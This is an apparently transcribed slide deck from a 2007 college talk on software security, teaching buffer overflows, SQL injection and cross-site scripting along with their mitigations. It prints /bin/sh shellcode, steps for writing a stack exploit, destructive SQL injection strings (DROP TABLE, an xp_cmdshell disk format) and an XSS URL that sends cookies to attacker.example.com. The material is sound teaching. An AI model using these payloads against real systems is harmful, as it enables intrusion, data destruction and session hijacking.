april 26, 2007 centre college: software security
DESCRIPTION
TRANSCRIPT
April 26, 2007 Centre College: Software Security
Software SecurityHave You Ever Written a Security
Bug?
April 26, 2007 Centre College: Software Security
Charles Frank
• Department of Computer Science
• Northern Kentucky University
• http://www.nku.edu/~frank
April 26, 2007 Centre College: Software Security
What We Don’t Know
“Have you ever written a program section with a security hole? How do you know?”
Mark G. Graff & Kenneth R. van Wyk
April 26, 2007 Centre College: Software Security
A Growing Problem
1995 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006
0
1000
2000
3000
4000
5000
6000
7000
8000
9000
Software Vulnerabilities
Year
Vu
lne
rab
iliti
es
April 26, 2007 Centre College: Software Security
Traditional Security is Reactive
• Perimeter defense (firewalls)
• Intrusion detection• Over-reliance on
cryptography• Penetrate & patch• Penetration testing
April 26, 2007 Centre College: Software Security
What is web application security?
It’s more than just cryptography.– SSL won’t solve all your problems.
It’s more than securing the web server.– Web applications have their own problems.
It’s more than application firewalls.– Firewall can’t know every safe action at every
possible state in your application.
April 26, 2007 Centre College: Software Security
Firewalls don’t protect web apps
Firewall
Port 80HTTP Traffic
WebClient
WebServer
Application
Application
DatabaseServer
April 26, 2007 Centre College: Software Security
Penetrate and Patch
Discover flaws after deployment.Often by attackers.
Users may not deploy patches.
Patches may have security flaws (15%?)
Patches are maps to vulnerabilities.Attackers reverse engineer to create attacks.
April 26, 2007 Centre College: Software Security
The Problem is Software
“We wouldn’t have to spend so much time and effort on network security if we didn’t have such bad software security”
Bruce Schneier“Applied Cryptography”
“Secrets & Lies: Digital Security in a Networked World”
April 26, 2007 Centre College: Software Security
Hackers
“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”
John Viega & Gary McGraw
April 26, 2007 Centre College: Software Security
Developers Aren’t Ready
“64% of developers are not confident in their ability to write secure applications”
Bill Gates, RSA 2005
April 26, 2007 Centre College: Software Security
Industry Problem
• There is no software liability – no incentive for secure software
• Most developers never learned to produce secure code
• Because of competition and cost considerations, software is produced under severe time constraints.
April 26, 2007 Centre College: Software Security
Developer’s Education
• Most programming courses ignore secure software development
• Most software engineering courses ignore secure software engineering
April 26, 2007 Centre College: Software Security
Complexity
• Software products are growing in size• Windows XP has 40 million lines of code• 5-50 bugs per KLOC• 10% of bugs result in security faults• 40,000KLOC*5*10% = 25,000 security bugs• Software is often written in low level
languages such as C/C++
April 26, 2007 Centre College: Software Security
Security Problems
SECURITY BUGS
50%
• Buffer overflow
• Command injection
• Cross-site scripting
• Integer overflow
• Race condition
• Untrusted input
ARCHITECTURAL FLAWS
50%
• Cryptography misuse
• Lack of compartmentalization
• More privilege than necessary
• Relying on secret algorithms
• Sharing resources
• Usability problems
April 26, 2007 Centre College: Software Security
Essential Facts
Software Security ≠ Security FeaturesCryptography will not make you secure.
Application firewalls will not provide security.
50/50 Architecture/Coding Problems
An Emergent Property of SoftwareLike Usability or Reliability
Not a Feature
April 26, 2007 Centre College: Software Security
Software Security Practices
1. Code Reviews
2. Risk Analysis
3. Penetration Testing
SecurityOperations
Requirements Design Coding Testing Maintenance
RiskAnalysis
AbuseCases
Code Reviews +Static Analysis
PenetrationTesting
SecurityTesting
4. Security Testing
5. Abuse Cases
6. Security Operations
April 26, 2007 Centre College: Software Security
Software Vulnerabilities1. Malicious Client2. Buffer Overflow3. SQL Injection4. Cross-site Scripting5. Format String6. Race Condition7. Information Leakage8. Path Traversal9. Command Injection10. Integer Overflow11. PHP Include
April 26, 2007 Centre College: Software Security
Malicious Client
• Developers can mistakenly trust data from a client in server-side code
• Attackers can advantage of this trust
• Security tester’s job is to violate the data specifications to find security vulnerabilities
April 26, 2007 Centre College: Software Security
Manipulate Network Requests
• Write a client to send custom requests– Might modify the client code to send malformed
requests
• Use a proxy to receive network traffic from a client and modify it to send it to the server.– Foxfire Add-on “Tamper Data”– WebScarab from OWASP
April 26, 2007 Centre College: Software Security
Tamper Data
• Firefox Browser Add-on
• Google for Tamper Data
• Tools | Tamper Data
April 26, 2007 Centre College: Software Security
Buffer Overflow Topics
1. What is a Buffer Overflow?
2. Buffer Overflow Examples
3. Program Stacks
4. Smashing the Stack
5. Shellcode
6. Mitigations
April 26, 2007 Centre College: Software Security
Buffer OverflowsA program accepts too much input and stores it in a fixed length buffer that’s too small.
char A[8];short B;
A A A A A A A A B B
0 0 0 0 0 0 0 0 0 3
A A A A A A A A B B
o v e r f l o w s 0
gets(A);
April 26, 2007 Centre College: Software Security
Buffer Overflow Examples
Morris WormTook down most of Internet in 1988.
Exploited a buffer overflow in fingerd.
Subsequent worms used overflow attacks too.
MS07-004: Internet ExplorerBuffer overflow in VML.
Allows remote code execution.
Not the first overflow in IE or other browsers.
April 26, 2007 Centre College: Software Security
Buffer Overflow Example #1What’s the mistake in this program?
int main() {
int array[5] = {1, 2, 3, 4, 5}; printf("%d\n", array[5]);
}
Program output:
> gcc -o buffer buffer.c
> ./buffer7077876
April 26, 2007 Centre College: Software Security
Buffer Overflow Example #2Writing beyond the buffer:
int main() { int array[5] = {1, 2, 3, 4, 5}; int i;
for( i=0; i <= 255; ++i ) array[i] = 41;}
Program output: > gcc -o bufferw bufferw.c> ./bufferwSegmentation fault (core dumped)
April 26, 2007 Centre College: Software Security
What happened to our program?
The buffer overflow:Overwrote memory beyond buffer with 41.
Memory page was not writable by program.
OS terminated prog with segmentation fault.
Do overflows always produce a crash?Most of the time, yes.
Careful attacker can access valid memory.
April 26, 2007 Centre College: Software Security
Why do programmers keep making the same mistake?
C/C++ inherently unsafe.
No bounds checking.
Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc.
Java, Python largely immune.C/C++ gains performance by not checking.
April 26, 2007 Centre College: Software Security
Stack at Function Start
Frame Pointer
Stack Pointer
old stack frame
parameter #N
…
parameter #1
return address
old FP
local vars
April 26, 2007 Centre College: Software Security
Shellcode
Shellcode is machine code that starts a command shell. With a shell, you can run any command.
April 26, 2007 Centre College: Software Security
ShellcodeShellcode in C.
int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0);}
Running the program.> gcc –ggdb –static –o shell shellcode.c> ./shellsh-3.00$ exit
April 26, 2007 Centre College: Software Security
From C to Machine Languagechar shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;}
> gcc -o testsc2 testsc2.c> ./testsc2sh-3.00$ exit
April 26, 2007 Centre College: Software Security
Writing an Exploit
1. Construct shellcode to inject.2. Find exploitable buffer in a program.3. Estimate address of buffer.4. Run program with an input that:
1. Injects shellcode into stack memory.2. Overwrites return address with address of your
shellcode.
April 26, 2007 Centre College: Software Security
Compiler Defenses: Canaries
Goal: Detect altered return addresses.
Method: Compiler changes stack layout.Adds canary to stack when function called.
Must overwrite canary to change return addr.
Checks canary before function returns.
Terminate program if canary modified.
Canaries are random to prevent guessing.
Visual Studio 2005 and gcc 4.1 use canaries.
April 26, 2007 Centre College: Software Security
Canary Stack Layout
old frame
param2
param1
return address
saved EBP
canary value
local vars
April 26, 2007 Centre College: Software Security
Buffer Overflow: Key Points
Buffer overflow attacks.– C/C++ perform no bounds checking.– There is no difference btw code and data.– Smashing the stack.
Mitigating buffer overflows.– Use a language with bounds checking.– Check your own bounds in C/C++.– Use safe functions, string libraries.
April 26, 2007 Centre College: Software Security
SQL Injection1. App sends form to user.2. Attacker submits form
with SQL exploit data.3. Application builds string
with exploit data.4. Application sends SQL
query to DB.5. DB executes query,
including exploit, sends data back to application.
6. Application returns data to user.
Attacker
Web Server DB Server
Firewall
User
Pass
‘ or 1=1--
April 26, 2007 Centre College: Software Security
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username = '$username' and password = '$password'";
$result = mysql_query($query);
April 26, 2007 Centre College: Software Security
SQL Metacharacters‘ quotes parameters
; separates commands
-- comments
%, _ glob in LIKE clause
%, _, *, +, |, [], () used for regular expressions in SIMILAR TO clause
April 26, 2007 Centre College: Software Security
SQL Injection Attack #1
Unauthorized Access Attempt:password = ’ or 1=1 --
SQL statement becomes:select count(*) from users where username =
‘user’ and password = ‘’ or 1=1 --
Checks if password is empty OR 1=1, which is always true, permitting access.
April 26, 2007 Centre College: Software Security
SQL Injection Attack #2
Database Modification Attack:password = foo’; delete from table users
where username like ‘%
Database executes two SQL statements:select count(*) from users where username =
‘user’ and password = ‘foo’
delete from table users where username like ‘%’
April 26, 2007 Centre College: Software Security
Impact of SQL InjectionSELECT SSN FROM USERS WHERE UID=‘$UID’
INPUT RESULT
5 Returns info for user with UID 5.
‘ OR 1=1-- Returns info for all users.
‘ UNION SELECT Field FROM Table WHERE 1=1--
Returns all rows from another table.
‘;DROP TABLE USERS--
Deletes the users table.
‘;master.dbo.xp_cmdshell ‘cmd.exe format c: /q /yes’ --
Formats C: drive of database server if you’re running MS SQL Server and extended procedures aren’t disabled.
April 26, 2007 Centre College: Software Security
Solution: Prepared Queries
require_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options);
if (PEAR::isError($mdb2)) {
die($mdb2->getMessage());
}
$sql = “SELECT count(*) from users where username = ? and password = ?”;
$types = array('text', 'text');
$sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP);
$data = array($username, $password);
$sth->execute($data);
April 26, 2007 Centre College: Software Security
Cross Site Scripting Attacks (XSS)
• Run Javascript in the victim’s browser– <script>alert(‘XSS’);</script>
• Get the user’s cookie for the Web site to display – perhaps revealing the session ID– <script>alert(document.cookie);</script>
• Steal the cookie and hijack the user’s session– Craft a request to the attackers machine with the cookie as
part of the file name, e.g. for an image source.
April 26, 2007 Centre College: Software Security
Reflected XSS Attacks
Server side code takes script in user input and echoes the script back to run on the user machine.
April 26, 2007 Centre College: Software Security
Example
http://server/search.aspx?keyword=<SCRIPT> alert(“Running!)</SCRIPT>
<BODY><H1>Search Results</H1>for =<SCRIPT> alert(“Running!)</SCRIPT><h2>Sorry, no results were found for.</h2>
April 26, 2007 Centre College: Software Security
Exploiting an XSS Bug
• Attacker must trick the user into running the URL with the query string.
• Send a user an email with a link to a Web site
• http://server/search.aspx?keyword=<SCRIPT>document.location=“http://attacker.example.com/default.aspx?%2Bescape(document.cookie);”</SCRIPT>
April 26, 2007 Centre College: Software Security
Anatomy of an XSS Attack
1. Login
2.
Cookie
Web Server
3. XSS Attack
Attacker User
4. User clicks on XSS link.
5. XSS URL
7. Browser runs injected code.
Evil Site saves cookie.
8. Attacker uses stolen cookie to hijack user session.
6. Page with injected code.
April 26, 2007 Centre College: Software Security
Exploiting POST<body><% dim strName: strName = Request.Form("myName") if strName = "" then %> <form method="POST" name="myForm"> Name: <input type="text" name="myName"> <input type="submit" value="Submit"> </form></body></html> <% Response.End Else Response.Write "Hello, " & strName & ". Nice to meet you." End If%></body>
April 26, 2007 Centre College: Software Security
What should we enter for Name?
<SCRIPT>alert(‘XSS!’)</SCRIPT>
April 26, 2007 Centre College: Software Security
Getting the Victim to Submit Malicious POST
Attackers can trick victims into sending the script data in the POST by hosting the form that asks for the user’s name on the attacker’s Web site. The attacker can pre-populate the Name field with the script that exploits the XSS vulnerability.
April 26, 2007 Centre College: Software Security
Testing
• Save the Web page to your site.
• <form method=“POST” name=“myForm” action=http://VulnerableWebSite/helloPostDemo.asp>
• <input type=“text” name=“myName” value=“<SCRIPT>alert(‘Hi!’)</SCRIPT>”>
April 26, 2007 Centre College: Software Security
Automatically Submitting
<body>
….
<SCRIPT>Form.submit();</SCRIPT>
April 26, 2007 Centre College: Software Security
Persistent XSS Attack
• Put <script>alert(‘Hi!’)</script> into a guestbook entry.
• View the guestbook entries page again.
April 26, 2007 Centre College: Software Security
Stopping XSS Attacks
• Encode HTML of attacker’s input before returning it to the browser.
• Problem: Blogs may want users to use HTML. Block the script tag?
Original
Character
HTML
Encoded
< <
> >
& &
“ "
April 26, 2007 Centre College: Software Security
Events
• Most tags have events
<INPUT name=“txtInput2” type=“text” value = ‘ OurData’ onclick=alert(‘Hi’) junk=‘’>
• When the user clicks on the text box the onclick event will fire.
April 26, 2007 Centre College: Software Security
Microsoft ASP.NET
• When ValidateRequest property is enabled, the query string and POST data are inspected.
• Suspicious data, such as <script> and onload=, cause an exception to be thrown.
April 26, 2007 Centre College: Software Security
Identifying XSS Vulnerabilities
1. Identify where user data is supplied.
2. Send valid-looking data to the application.
3. Verify whether any of the data is returned to the Web browser.
4. Find ways to force the victim to send data and have it run as a script on the client machine.
April 26, 2007 Centre College: Software Security
Knowledge
SPI Dynamic White papers– http://www.spidynamics.com/spilabs/education/wh
itepapers.html
– Blind SQL Injection– Cross Site Scripting
April 26, 2007 Centre College: Software Security
OWASP Web Goat
Teaches Web application security through a series of lessons.
http://www.owasp.org/index.php/OWASP_WebGoat_Project
Lesson Planshttp://www.owasp.org/index.php/Lesson_Plans